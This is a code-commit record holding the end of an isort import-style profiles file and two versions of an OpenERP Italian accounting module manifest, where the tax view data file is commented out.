    "open_stack": open_stack,
    "plone": plone,
    "attrs": attrs,
    "hug": hug,
    "wemake": wemake,
    "appnexus": appnexus,
}
| """Common profiles are defined here to be easily used within a project using --profile {name}"""
from typing import Any, Dict
black = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"ensure_newline_before_comments": True,
"line_length": 88,
}
django = {
"combine_as_imports": True,
"include_trailing_comma": True,
"multi_line_output": 5,
"line_length": 79,
}
pycharm = {
"multi_line_output": 3,
"force_grid_wrap": 2,
"lines_after_imports": 2,
}
google = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
"single_line_exclusions": ("typing",),
"order_by_type": False,
"group_by_package": True,
}
open_stack = {
"force_single_line": True,
"force_sort_within_sections": True,
"lexicographical": True,
}
plone = {
"force_alphabetical_sort": True,
"force_single_line": True,
"lines_after_imports": 2,
"line_length": 200,
}
attrs = {
"atomic": True,
"force_grid_wrap": 0,
"include_trailing_comma": True,
"lines_after_imports": 2,
"lines_between_types": 1,
"multi_line_output": 3,
"use_parentheses": True,
}
hug = {
"multi_line_output": 3,
"include_trailing_comma": True,
"force_grid_wrap": 0,
"use_parentheses": True,
"line_length": 100,
}
wemake = {
"multi_line_output": 3,
"include_trailing_comma": True,
"use_parentheses": True,
"line_length": 80,
}
appnexus = {
**black,
"force_sort_within_sections": True,
"order_by_type": False,
"case_sensitive": False,
"reverse_relative": True,
"sort_relative_in_force_sorted_sections": True,
"sections": ["FUTURE", "STDLIB", "THIRDPARTY", "FIRSTPARTY", "APPLICATION", "LOCALFOLDER"],
"no_lines_before": "LOCALFOLDER",
}
profiles: Dict[str, Dict[str, Any]] = {
"black": black,
"django": django,
"pycharm": pycharm,
"google": google,
"open_stack": open_stack,
"plone": plone,
"attrs": attrs,
"hug": hug,
"wemake": wemake,
"appnexus": appnexus,
}
| mit | Python |
0a4da4bc40813362b9d6c67c2fb02f33a807f3fe | fix error on tax view | iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP,iw3hxn/LibrERP | l10n_it_account/__openerp__.py | l10n_it_account/__openerp__.py | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2013 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Italian Localisation',
    'version': '2.15.30.32',
    'category': 'Localisation/Italy',
    'description': """This module customizes OpenERP in order to fit italian laws and mores - Account version
Functionalities:
- Fiscal code computation for partner, and fiscal code check
- Check invoice date consistency
- CIG on invoice
""",
    'author': 'OpenERP Italian Community, Didotech srl',
    'website': 'http://www.openerp-italia.org, http://www.didotech.com',
    'license': 'AGPL-3',
    'depends': [
        'account',
        'base_vat',
        'account_chart',
        'base_iban',
        'l10n_it_base',
        'account_voucher',
        'sale_order_confirm',
        # 'account_invoice_entry_date', not possible for use of a field defined here invoice_supplier_number
    ],
    'data': [
        'account/partner_view.xml',
        'account/fiscal_position_view.xml',
        'account/account_sequence.xml',
        'account/invoice_view.xml',
        'account/voucher_view.xml',
        'account/payment_type_view.xml',
        'wizard/select_fiscal_position_view.xml',
        'data/bank_iban_data.xml',
        'account/account_move.xml',
        'account/res_bank_view.xml',
        'account/account_tax_view.xml',
        'account/res_company_view.xml',
        'account/account_invoice_workflow.xml',
    ],
    'demo': [],
    'active': False,
    'installable': True,
    'external_dependencies': {
        'python': ['codicefiscale'],
    }
}
| # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2010-2013 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Italian Localisation',
    'version': '2.15.30.32',
    'category': 'Localisation/Italy',
    'description': """This module customizes OpenERP in order to fit italian laws and mores - Account version
Functionalities:
- Fiscal code computation for partner, and fiscal code check
- Check invoice date consistency
- CIG on invoice
""",
    'author': 'OpenERP Italian Community, Didotech srl',
    'website': 'http://www.openerp-italia.org, http://www.didotech.com',
    'license': 'AGPL-3',
    'depends': [
        'account',
        'base_vat',
        'account_chart',
        'base_iban',
        'l10n_it_base',
        'account_voucher',
        'sale_order_confirm',
        # 'account_invoice_entry_date', not possible for use of a field defined here invoice_supplier_number
    ],
    'data': [
        'account/partner_view.xml',
        'account/fiscal_position_view.xml',
        'account/account_sequence.xml',
        'account/invoice_view.xml',
        'account/voucher_view.xml',
        'account/payment_type_view.xml',
        'wizard/select_fiscal_position_view.xml',
        'data/bank_iban_data.xml',
        'account/account_move.xml',
        'account/res_bank_view.xml',
        # 'account/account_tax_view.xml',
        'account/res_company_view.xml',
        'account/account_invoice_workflow.xml',
    ],
    'demo': [],
    'active': False,
    'installable': True,
    'external_dependencies': {
        'python': ['codicefiscale'],
    }
}
| agpl-3.0 | Python |